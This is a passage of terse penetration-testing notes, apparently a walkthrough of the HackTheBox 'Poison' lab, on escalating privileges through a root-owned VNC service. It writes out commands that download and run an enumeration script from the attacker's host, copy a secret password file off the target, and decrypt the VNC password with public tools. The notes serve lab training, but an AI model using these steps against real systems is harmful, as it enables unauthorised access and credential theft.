vnc

Find vnc running as root

LinEnum.sh

wget $MyIP:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh              ..script didnt work for bsd

ps -auxw                  ..look at processes
vnc ..tightvnc            ..found running as root!!

netstat -an | grep LIST   ..vnc listening on 5801,5901

Password file

Strange looking file.
Copy locally to analyze.

secret.zip            ..found

scp chariz@$IP:secret.zip .
unzip secret.zip

file secret           ..non-iso ascii, unknown
cat secret            ..jibberish
xxd secret            ..nada

Connect with password file

vncviewer -passwd secretfile 10.x.x.x::6901

Password decrypt (bonus)

----------------
git clone https://github.com/jeroennijhof/vncpwd
cd vncpwd
make
./vncpwd
./vncpwd ../secret    ..password found!

----------------
github > trinitronx/vncpasswd.py
python vncpasswd.py -d -f ./htb/poison/secret

PreviousTransfer Files Next07 Windows PrivEsc

Last updated 2 years ago

Was this helpful?